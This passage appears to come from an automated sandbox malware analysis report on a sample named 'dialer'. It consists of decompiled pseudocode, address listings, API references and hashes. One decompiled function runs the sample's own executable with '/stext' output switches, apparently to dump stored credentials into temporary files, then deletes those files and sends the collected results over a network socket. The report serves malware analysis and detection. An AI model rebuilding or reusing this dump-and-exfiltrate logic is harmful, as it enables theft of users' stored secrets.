									__edx = L00401F75(0x46c518);
									__eax = E00410670(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
									goto L102;
								case 0x2e:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E0040F1DB(__edx);
									goto L102;
								case 0x2f:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E0041553B(__edx);
									L102:
									goto L125;
							}
						}
					}
				}
				L130:
			}

0x00411d70
0x00411d70
0x00411d70
0x00411d80
0x00411d82
0x00411d8a
0x00411d92
0x00411daf
0x00411db9
0x00411dbe
0x00411dc9
0x00411dce
0x00411ddb
0x00411de4
0x00411dee
0x00411df1
0x00411df3
0x00412a4a
0x00412a50
0x00412a53
0x00412a60
0x00000000
0x00412a8c
0x00412a95
0x00412a97
0x00412aa3
0x00412aa5
0x00000000
0x00000000
0x00412ab1
0x00412aba
0x00412abc
0x00412ac2
0x00412aca
0x00412ace
0x00412ad5
0x00412ad7
0x00412add
0x00412adf
0x00412ae3
0x00412ae9
0x00412aed
0x00412af4
0x00412af8
0x00412afa
0x00412aff
0x00412b02
0x00412b05
0x00412b0a
0x00412b0c
0x00412b11
0x00412b14
0x00412b1d
0x00412b1f
0x00412b21
0x00000000
0x00000000
0x00412bb1
0x00412bba
0x00412bbc
0x00412bc4
0x00412bcd
0x00412bcf
0x00412bdc
0x00000000
0x00000000
0x00412c29
0x00412c2d
0x00412c32
0x00412c35
0x00412c3d
0x00000000
0x00000000
0x00412c49
0x00412c4d
0x00412c52
0x00412c55
0x00412c5d
0x00000000
0x00000000
0x00412a78
0x00412a7d
0x00000000
0x00000000
0x00412be9
0x00412bed
0x00412bf2
0x00412bf5
0x00412bfd
0x00000000
0x00000000
0x00412c09
0x00412c0d
0x00412c12
0x00412c15
0x00412c1d
0x00000000
0x00000000
0x00412ced
0x00000000
0x00000000
0x00412cf4
0x00000000
0x00000000
0x00412cfb
0x00000000
0x00000000
0x00412cbe
0x00412cc0
0x00412ccb
0x00412ccd
0x00412cd4
0x00412cd8
0x00412cda
0x00412cdd
0x00412ce2
0x00412ce4
0x00412ce6
0x00000000
0x00000000
0x00412c67
0x00000000
0x00000000
0x00412d02
0x00412d09
0x00412d0d
0x00412d0f
0x00412d14
0x00412d17
0x00412d1b
0x00412d1d
0x00412d2a
0x00412d2c
0x00412d36
0x00412d38
0x00412d3a
0x00412d40
0x00000000
0x00000000
0x00412c71
0x00412c78
0x00412cb3
0x00412c7a
0x00412c7a
0x00412c7c
0x00412c81
0x00412c8d
0x00412c93
0x00412c93
0x00000000
0x00000000
0x00412b9f
0x00000000
0x00000000
0x00412ba6
0x00412ba8
0x00412ba9
0x00000000
0x00000000
0x00412b34
0x00412b3b
0x00412b42
0x00412b46
0x00412b4b
0x00412b4e
0x00412b51
0x00412b58
0x00412b5c
0x00412b61
0x00412b64
0x00412b67
0x00412b6e
0x00412b72
0x00412b77
0x00412b7a
0x00412b7d
0x00412b82
0x00412b89
0x00412b8e
0x00412b95
0x00000000
0x00000000
0x00000000
0x00000000
0x00412a60
0x00000000
0x00411df9
0x00411df9
0x00412958
0x00412975
0x00412980
0x0041298a
0x0041299a
0x0041299a
0x0041299d
0x004129a2
0x004129a8
0x004129b3
0x004129be
0x004129db
0x004129f8
0x00412a04
0x00412a09
0x00412a11
0x00412a34
0x00412a34
0x00412a40
0x00000000
0x00411dff
0x00411dff
0x00411e03
0x00412d61
0x00412d65
0x00412d71
0x00412d7d
0x00412d8a
0x00411e09
0x00411e0b
0x00000000
0x00411e1e
0x00411e38
0x00411e54
0x00411eaf
0x00411eb3
0x00411ebe
0x00411ec2
0x00411ecb
0x00411ed7
0x00411ee3
0x00411eef
0x00411efb
0x00411f07
0x00411f13
0x00411f1c
0x00411f25
0x00411f3d
0x00411f45
0x00411f72
0x00411f77
0x00411f7e
0x00411f83
0x00411f85
0x00411f8b
0x00411f8c
0x00000000
0x00411f8c
0x00411f47
0x00411f49
0x00411f53
0x00411f63
0x00411f55
0x00411f56
0x00411f56
0x00411f53
0x00000000
0x00000000
0x00411f98
0x00411f9a
0x00411f8e
0x00411f8e
0x00000000
0x00000000
0x004128ed
0x004128f1
0x004128f6
0x004128f9
0x004128fb
0x004128fd
0x00412902
0x00412904
0x00412909
0x0041290e
0x00000000
0x00000000
0x00000000
0x00000000
0x00411fa8
0x00411faf
0x00411fb4
0x00411fb7
0x00411fbb
0x00411fbd
0x00411fc8
0x00411fca
0x00411fd4
0x00411fd6
0x00411fd8
0x00411fde
0x00412d45
0x00412d45
0x00412d4a
0x00412d4f
0x00412d53
0x00412d58
0x00412d5c
0x00000000
0x00000000
0x00411fe7
0x00411ff0
0x00411ff2
0x00411ffe
0x00412000
0x00000000
0x00000000
0x00412088
0x00412088
0x00000000
0x00000000
0x0041200c
0x00412015
0x00412017
0x00412024
0x00000000
0x00000000
0x0041202f
0x00000000
0x00000000
0x00412056
0x00412031
0x00412031
0x00412033
0x00412033
0x0041203c
0x0041203e
0x0041204b
0x00000000
0x00000000
0x0041205a
0x00412061
0x0041206a
0x0041206c
0x00412079
0x0041207f
0x00412083
0x00000000
0x00000000
0x00412092
0x00412094
0x004120a0
0x004120a2
0x004120a8
0x004120ac
0x004120b2
0x004120b7
0x004120c1
0x004120d4
0x004120da
0x004120de
0x004120e3
0x00000000
0x00000000
0x004120ee
0x004120f2
0x004120f8
0x004120fd
0x00412102
0x00412108
0x00412110
0x00412114
0x00412119
0x0041211c
0x00412124
0x00000000
0x00412124
0x00000000
0x00000000
0x00412130
0x00412132
0x0041213e
0x0041214c
0x00000000
0x00000000
0x00412159
0x0041215d
0x00412163
0x00412168
0x0041216f
0x00412178
0x0041217a
0x00412186
0x00412188
0x00412190
0x00412199
0x0041219b
0x004121a1
0x004121a7
0x004121a9
0x004121af
0x004121af
0x004121af
0x004121b7
0x004121bf
0x004121c5
0x004121c7
0x004121c9
0x00000000
0x00000000
0x004121d4
0x004121d5
0x004121da
0x004121dc
0x004121dc
0x00000000
0x00000000
0x004121e2
0x004121e6
0x004121eb
0x004121ee
0x004121f1
0x004121f6
0x004121fb
0x00000000
0x00000000
0x00412205
0x0041220a
0x00000000
0x00000000
0x00412214
0x00412219
0x00000000
0x00000000
0x00412225
0x00412229
0x0041222f
0x00412234
0x00412239
0x00000000
0x00000000
0x00412248
0x00412248
0x0041224e
0x00412254
0x00412259
0x0041225c
0x0041225f
0x00412264
0x00412269
0x00000000
0x00000000
0x00412279
0x0041227e
0x00412280
0x00412285
0x0041223e
0x0041223e
0x00000000
0x00000000
0x00412937
0x00412938
0x0041293d
0x00412943
0x00412945
0x00412947
0x00412947
0x00000000
0x00000000
0x00412289
0x0041228b
0x00412290
0x00412296
0x0041229b
0x004122a0
0x004122a5
0x004122aa
0x004122ad
0x004122b2
0x004122b4
0x004122b5
0x004122b6
0x004122b7
0x004122b8
0x004122bd
0x004122bf
0x004122c4
0x004122c7
0x004122c9
0x004122ce
0x004122d4
0x004122df
0x004122d6
0x004122d6
0x004122db
0x004122e6
0x004122e8
0x004122f3
0x004122f5
0x00000000
0x00000000
0x004122ff
0x00412305
0x0041230a
0x00000000
0x00000000
0x00412314
0x00412316
0x0041231c
0x00412322
0x00412327
0x0041232a
0x0041232d
0x00412334
0x0041233d
0x0041233f
0x0041234b
0x0041234e
0x00412357
0x00412359
0x0041235f
0x00412366
0x0041236a
0x00412371
0x00412373
0x00412379
0x0041237f
0x00412381
0x00412383
0x00000000
0x00000000
0x00412390
0x00412391
0x00412396
0x004123a9
0x00000000
0x00000000
0x004123b4
0x004123b4
0x004123b5
0x004123ba
0x004123c0
0x004123c5
0x004123c8
0x004123cb
0x004123d2
0x004123d6
0x004123db
0x004123de
0x004123e6
0x004123eb
0x0041226e
0x0041226e
0x00000000
0x00000000
0x004123f5
0x004123fe
0x00412406
0x00000000
0x00000000
0x00412411
0x00412418
0x00000000
0x00412426
0x00412426
0x0041242c
0x00000000
0x00000000
0x00412420
0x00412420
0x0041242f
0x00412430
0x00412432
0x00412432
0x00412d8d
0x00412d94
0x00412d96
0x00412d97
0x00412d9d
0x00412da0
0x00412da1
0x00412da6
0x00412da7
0x00412dad
0x00412dae
0x00412daf
0x00412db5
0x00412db8
0x00412db9
0x00412dbc
0x00412dbd
0x00412dc0
0x00412dc1
0x00412dc4
0x00412dc4
0x00412dc4
0x00412dc5
0x00412dc8
0x00412dc9
0x00412dcc
0x00412dd0
0x00412dd1
0x00412dd4
0x00412dd6
0x00412dd7
0x00412dd9
0x00412ddc
0x00412de1
0x00412de4
0x00412de6
0x00412de7
0x00412dea
0x00412deb
0x00412dee
0x00412def
0x00412df1
0x00412df4
0x00412df5
0x00412dfa
0x00412dfb
0x00412e01
0x00412e04
0x00412e06
0x00412e07
0x00412e0d
0x00412e10
0x00412e14
0x00412e17
0x00412e19
0x00412e1b
0x00412e1d
0x00412e1f
0x00412e22
0x00412e23
0x00412e25
0x00412e27
0x00412e2a
0x00412e2b
0x00412e31
0x00412e32
0x00412e33
0x00412e39
0x00412e3a
0x00412e3b
0x00412e41
0x00412e42
0x00412e43
0x00412e45
0x00412e48
0x00412e4d
0x00412e50
0x00412e51
0x00412e51
0x00412e54
0x00412e56
0x00412e57
0x00412e59
0x00412e5c
0x00412e5d
0x00412e62
0x00412e63
0x00412e69
0x00412e6c
0x00412e6d
0x00412e70
0x00412e71
0x00412e73
0x00412e76
0x00412e77
0x00412e7a
0x00412e7b
0x00412e7d
0x00412e7d
0x00412e7d
0x00412e7e
0x00412e7f
0x00412e81
0x00412e83
0x00412e85
0x00412e87
0x00412e89
0x00412e8b
0x00412e8d
0x00412e8f
0x00412e95
0x00412e97
0x00412e99
0x00412e9e
0x00412e9f
0x00412ea5
0x00412ea8
0x00412eaa
0x00412eab
0x00412eae
0x00412eaf
0x00412eb1
0x00412eb3
0x00412eb5
0x00412eb7
0x00412eb9
0x00412eba
0x00412ebb
0x00412ebd
0x00412ebf
0x00412ec1
0x00412ec3
0x00412ec5
0x00412ec7
0x00412ec9
0x00412ecb
0x00412ed0
0x00412ed2
0x00412ed3
0x00412ed4
0x00412ed8
0x00412ee0
0x00412ee2
0x00412ee3
0x00000000
0x00000000
0x00412433
0x00000000
0x00000000
0x00412445
0x00412445
0x0041244b
0x00000000
0x00000000
0x0041243f
0x0041243f
0x0041244d
0x0041244f
0x00412459
0x0041245b
0x00412462
0x00412466
0x0041246d
0x0041246f
0x00412474
0x00412476
0x0041247b
0x00412481
0x00412482
0x00412483
0x0041248c
0x0041248f
0x00412498
0x0041249a
0x0041249f
0x004124a0
0x004124a1
0x004124a7
0x004124a9
0x00000000
0x00000000
0x00000000
0x00000000
0x004124d3
0x004124d3
0x004124d9
0x00000000
0x00000000
0x004124cd
0x004124cd
0x004124dd
0x004124e6
0x004124e8
0x004124ef
0x004124f3
0x004124fa
0x004124fc
0x00412501
0x00412503
0x00412508
0x0041250e
0x00412512
0x00412519
0x0041251d
0x0041251f
0x00412524
0x00412527
0x0041252a
0x0041252f
0x00412531
0x00412536
0x00412539
0x0041253b
0x004124af
0x004124af
0x004124b2
0x004124b6
0x004124be
0x004124c3
0x004124c3
0x00000000
0x00000000
0x00412548
0x00412551
0x00412553
0x0041255f
0x00412564
0x00412570
0x00412572
0x00412578
0x0041257a
0x00412584
0x0041258d
0x00000000
0x00000000
0x00412598
0x0041259d
0x0041259f
0x004125a4
0x004125a9
0x004125ae
0x004125b0
0x004125b5
0x004125b9
0x004125ba
0x004125bc
0x004125d4
0x004125d9
0x004125de
0x004125e0
0x004125e5
0x004125e9
0x004125ea
0x004125ec
0x00412607
0x0041260c
0x00412611
0x00412613
0x00412618
0x0041261a
0x0041264f
0x00412656
0x0041265d
0x00412661
0x00412663
0x00412668
0x0041266d
0x0041266f
0x00412674
0x00412675
0x00412677
0x0041267d
0x00412681
0x00412686
0x0041268b
0x0041268d
0x00412692
0x00412694
0x0041269a
0x0041269b
0x0041269c
0x00000000
0x0041269c
0x00412679
0x00412679
0x0041267a
0x0041269e
0x0041269e
0x0041269e
0x0041261c
0x0041261c
0x0041261f
0x00412628
0x0041262a
0x00412630
0x00412635
0x00412635
0x00000000
0x00412635
0x004125ee
0x004125f5
0x004125f7
0x004125fd
0x00412602
0x00000000
0x00412602
0x004125be
0x004125c5
0x004125c7
0x004125cd
0x00412638
0x00412638
0x0041263a
0x0041263a
0x00000000
0x00000000
0x0041273f
0x00412740
0x00412746
0x00412748
0x00412756
0x00412760
0x00412768
0x0041276e
0x00412775
0x00412779
0x0041277d
0x00412782
0x00412785
0x00412789
0x0041278b
0x00412790
0x00412792
0x00412797
0x00412b26
0x00412b26
0x00412b2a
0x00412b2a
0x00412b2a
0x00000000
0x00000000
0x004126ac
0x004126ae
0x004126b4
0x004126bb
0x004126c4
0x004126c6
0x004126cb
0x004126da
0x004126dd
0x004126e4
0x004126e8
0x004126ef
0x004126f1
0x004126f8
0x00412701
0x0041271c
0x00000000
0x0041271c
0x00000000
0x00000000
0x00412725
0x0041272b
0x0041272d
0x00412733
0x00412739
0x00412739
0x00000000
0x00412739
0x00000000
0x00000000
0x004127a3
0x004127ac
0x004127b3
0x004127b5
0x00000000
0x00000000
0x004127bf
0x004127c3
0x004127c7
0x004127cb
0x004127cf
0x004127d8
0x004127da
0x004127df
0x004127e3
0x004127e5
0x004127eb
0x004127ee
0x004127f4
0x00412801
0x004121ce
0x004121ce
0x004121ce
0x00000000
0x00000000
0x0041280b
0x00000000
0x00000000
0x00412817
0x0041281b
0x00412820
0x00412823
0x0041282b
0x00000000
0x00000000
0x00412837
0x0041283b
0x00412840
0x00412843
0x0041284b
0x00000000
0x00000000
0x00412857
0x0041285b
0x00412860
0x00412863
0x0041286b
0x00000000
0x00000000
0x00412875
0x00412876
0x0041287b
0x0041287d
0x00412883
0x00412885
0x0041288b
0x0041288d
0x00412897
0x0041289e
0x0041289f
0x004128aa
0x004128ac
0x004128b7
0x004128c1
0x004128c3
0x00000000
0x00000000
0x004128cf
0x004128d3
0x004128d8
0x004128db
0x004128e3
0x00000000
0x00000000
0x00412919
0x0041291d
0x00412922
0x00412925
0x0041292d
0x00412a82
0x00000000
0x00000000
0x00411e0b
0x00411e03
0x00411df9
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 00411D92
GetTickCount.KERNEL32 ref: 00411E12

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID:
API String ID: 180926312-0
Opcode ID: 0ee3cb1fe3526052f4227878ed39b7a34c91c9d81f14b92878ba4f8e550bd131
Instruction ID: 615ce1591b57c20b31945536f17f605906eb84056074feb92e2c30252748a10f
Opcode Fuzzy Hash: 0ee3cb1fe3526052f4227878ed39b7a34c91c9d81f14b92878ba4f8e550bd131
Instruction Fuzzy Hash: F9E183716043019AC614FB72DD67AAE72A89F90308F40093FF542A71E2EE7C9A45C79B

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCF5, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 374
filesleepCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040FCF5(void* __eflags, void* _a4, char _a28, char _a52, char _a76, char _a100) {
				char _v5;
				char _v6;
				char _v7;
				char _v12;
				char _v36;
				char _v60;
				char _v84;
				char _v108;
				char _v132;
				char _v156;
				char _v180;
				char _v204;
				char _v228;
				char _v252;
				char _v276;
				char _v300;
				char _v324;
				char _v348;
				char _v372;
				char _v396;
				char _v420;
				char _v444;
				char _v468;
				short _v988;
				void* __ebx;
				void* __edi;
				void* _t173;
				void* _t199;
				void* _t225;
				void* _t226;
				void* _t394;
				void* _t399;
				void* _t402;
				void* _t405;

				_t405 = __eflags;
				_v12 = 0;
				GetModuleFileNameW(0,  &_v988, 0x104);
				_v5 = 0;
				_v6 = 0;
				E004020B5(0,  &_v300);
				E004020B5(0,  &_v276);
				E004020B5(0,  &_v252);
				E00417967( &_v228, 0x30, L00401F75(E004169EB( &_v36)));
				L00401FA7();
				E00417967( &_v204, 0x30, L00401F75(E004169EB( &_v36)));
				L00401FA7();
				E00417967( &_v180, 0x30, L00401F75(E004169EB( &_v36)));
				L00401FA7();
				L00401F75( &_a52);
				_t393 = L" /stext \"";
				_t224 = E00413CCA(L00401ECB(E00403086(0,  &_v396, E00404409(0,  &_v420, E004043E5(0,  &_v444,  &_v988, _t405, E0040425F(0,  &_v468, L" /stext \"")), _t405,  &_v228), L" /stext \"", _t405, "\"")));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401F75( &_a76);
				_t225 = E00413CCA(L00401ECB(E00403086(_t224,  &_v324, E00404409(_t137,  &_v348, E004043E5(_t137,  &_v372,  &_v988, _t405, E0040425F(_t137,  &_v60, _t393)), _t405,  &_v204), _t393, _t405, "\"")));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401F75( &_a100);
				_v7 = E00413CCA(L00401ECB(E00403086(_t225,  &_v84, E00404409(_t225,  &_v108, E004043E5(_t225,  &_v132,  &_v988, _t405, E0040425F(_t225,  &_v156, _t393)), _t405,  &_v180), _t393, _t405, "\"")));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				_t399 =  ==  ? 1 : 0;
				if(_t225 == 0) {
					_t399 = _t399 + 1;
				}
				if(_v7 == 0) {
					_t399 = _t399 + 1;
				}
				_t226 = DeleteFileW;
				_t394 = 0;
				L5:
				L5:
				if(E00417334(L00401ECB( &_v228),  &_v300) != 0) {
					_v12 = 1;
					DeleteFileW(L00401ECB( &_v228));
				}
				if(E00417334(L00401ECB( &_v204),  &_v276) != 0) {
					_v5 = 1;
					DeleteFileW(L00401ECB( &_v204));
				}
				if(E00417334(L00401ECB( &_v180),  &_v252) != 0) {
					_v6 = 1;
					DeleteFileW(L00401ECB( &_v180));
				}
				if(_v12 == 0 || _v5 == 0 || _v6 == 0) {
					goto L14;
				}
				L15:
				_t173 = E00405A22("0");
				_t418 = _t173;
				if(_t173 == 0) {
					L00402F73(_t226, _t402 - 0x18, L00402F73(_t226,  &_v156, L00402F73(_t226,  &_v132, L00402F73(_t226,  &_v108, L00402F73(_t226,  &_v84, L00402F97( &_v60,  &_a28, 0x46c238), __eflags,  &_v300), __eflags, 0x46c238), __eflags,  &_v276), __eflags, 0x46c238), __eflags,  &_v252);
					_push(0x6a);
					E00404A6E(_t226, 0x46c638, _t180, __eflags);
					L00401FA7();
					L00401FA7();
					L00401FA7();
					L00401FA7();
				} else {
					_t199 = E00416B7E(_t226,  &_v324, _t399);
					L00402EFD(_t402 - 0x18, L00402F73(_t226,  &_v156, L00402F73(_t226,  &_v132, L00402F73(_t226,  &_v108, L00402F73(_t226,  &_v84, L00402F73(_t226,  &_v60, L00402F73(_t226,  &_v372, L00402F97( &_v348,  &_a28, 0x46c238), _t418,  &_v300), _t418, 0x46c238), _t418,  &_v276), _t418, 0x46c238), _t418,  &_v252), _t418, 0x46c238), _t199);
					_push(0x69);
					E00404A6E(_t226, 0x46c638, _t207, _t418);
					L00401FA7();
					L00401FA7();
					L00401FA7();
					L00401FA7();
					L00401FA7();
					L00401FA7();
					L00401FA7();
				}
				L00401FA7();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401FA7();
				L00401FA7();
				L00401FA7();
				L00401FA7();
				L00401FA7();
				L00401FA7();
				L00401FA7();
				return L00401FA7();
				L14:
				Sleep(0x1f4);
				_t394 = _t394 + 1;
				if(_t394 < 0xa) {
					goto L5;
				}
				goto L15;
			}

0x0040fcf5
0x0040fd10
0x0040fd13
0x0040fd1f
0x0040fd22
0x0040fd25
0x0040fd30
0x0040fd3b
0x0040fd58
0x0040fd61
0x0040fd7e
0x0040fd87
0x0040fda4
0x0040fdad
0x0040fdb5
0x0040fdcd
0x0040fe18
0x0040fe20
0x0040fe2b
0x0040fe36
0x0040fe41
0x0040fe49
0x0040feaa
0x0040feac
0x0040feb7
0x0040fec2
0x0040feca
0x0040fed2
0x0040ff2a
0x0040ff2d
0x0040ff35
0x0040ff3d
0x0040ff48
0x0040ff56
0x0040ff5b
0x0040ff5d
0x0040ff5d
0x0040ff61
0x0040ff63
0x0040ff63
0x0040ff64
0x0040ff6a
0x00000000
0x0040ff6c
0x0040ff86
0x0040ff8e
0x0040ff98
0x0040ff98
0x0040ffb4
0x0040ffbc
0x0040ffc6
0x0040ffc6
0x0040ffe2
0x0040ffea
0x0040fff4
0x0040fff4
0x0040fffa
0x00000000
0x00000000
0x0041001d
0x00410025
0x0041002a
0x0041002c
0x0041017d
0x00410183
0x0041018a
0x00410195
0x0041019d
0x004101a5
0x004101ad
0x00410032
0x0041003a
0x004100be
0x004100c4
0x004100cb
0x004100d6
0x004100de
0x004100e6
0x004100ee
0x004100f6
0x00410101
0x0041010c
0x00410111
0x004101b5
0x004101c0
0x004101cb
0x004101d6
0x004101e1
0x004101ec
0x004101f7
0x004101ff
0x00410207
0x0041020f
0x00410217
0x0041022a
0x00410008
0x0041000d
0x00410013
0x00410017
0x00000000
0x00000000
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040FD13

Part of subcall function 004169EB: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040415D), ref: 00416A12

Part of subcall function 00413CCA: CloseHandle.KERNEL32(004041D6,?,004041D6,0045F454), ref: 00413CE0
Part of subcall function 00413CCA: CloseHandle.KERNEL32(0045F454,?,004041D6,0045F454), ref: 00413CE9

DeleteFileW.KERNEL32(00000000,0045F454,0045F454,0045F454), ref: 0040FF98
DeleteFileW.KERNEL32(00000000,0045F454,0045F454,0045F454), ref: 0040FFC6
DeleteFileW.KERNEL32(00000000,0045F454,0045F454,0045F454), ref: 0040FFF4
Sleep.KERNEL32(000001F4,0045F454,0045F454,0045F454), ref: 0041000D

Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2

Strings

/stext ", xrefs: 0040FDCD, 0040FDD3, 0040FE5F, 0040FEEB

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
String ID: /stext "
API String ID: 1351907930-3856184850
Opcode ID: fbe1e3400fe8215973639f5f85b9c4eb89193075f48cebba87edffed5abb823a
Instruction ID: c21b388484da0667b28d157df789ada90f80862a4aa73e48cf9e94ef02e829b4
Opcode Fuzzy Hash: fbe1e3400fe8215973639f5f85b9c4eb89193075f48cebba87edffed5abb823a
Instruction Fuzzy Hash: ADD150719101195ACB18FB61DC92AEDB375AF54308F4041BFF40AB71E2EF785E8ACA48

Uniqueness

Uniqueness Score: -1.00%

Function 0044190C, Relevance: 10.9, APIs: 7, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0044190C(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E0044154B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E004415A9( &_v8) != 0 || E00441551( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043629A();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E0044154B();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E004415A9( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0043629A();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x46a00c; // 0x3dad585e
						_v100 = _t74 ^ _t192;
						 *0x46a344 =  *0x46a344 | 0xffffffff;
						 *0x46a338 =  *0x46a338 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t139 = "TZ";
						_t172 = 0;
						 *0x46b748 = 0;
						_t78 = E004391A5(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E0043E61D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E004391A5(__eflags,  &_v280, _t184, _v276, _t139);
									__eflags = _t85;
									if(_t85 == 0) {
										L0043EE85(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									L0043EE85();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E0044190C(_t139, _t172, _t183, __eflags);
							}
						}
						L0043EE85(_t183);
						__eflags = _v16 ^ _t192;
						return E0042F61B(_v16 ^ _t192);
					} else {
						_t89 = E00441551( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E0044157D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								L0043EE85( *0x46b740);
								 *0x46b740 = 0;
								 *_t194 = 0x46b750;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x46b750 * 0x3c;
									_t167 =  *0x46b7a4; // 0x0
									_push(_t171);
									 *0x46b748 = 1;
									_v12 = _t150;
									__eflags =  *0x46b796; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x46b7ea; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x46b7f8; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E0043E1EC(0, _t167);
									_t99 = WideCharToMultiByte(_t176, 0, 0x46b754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x46b7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E00441545()) = _v12;
								 *((intOrPtr*)(E00441539())) = _v16;
								_t96 = E0044153F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x46b740; // 0x0
					_t178 = _a4;
					if(_t168 == 0) {
						L12:
						L0043EE85(_t168);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x441cfd
						_t169 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t169 + 1; // 0x441cfe
						 *0x46b740 = E0043E61D(_t154 - _t169, _t13);
						_t116 = L0043EE85(0);
						_t170 =  *0x46b740; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x441cfd
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x441cfe
							_t119 = E004405A6(_t170, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E0044C479(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
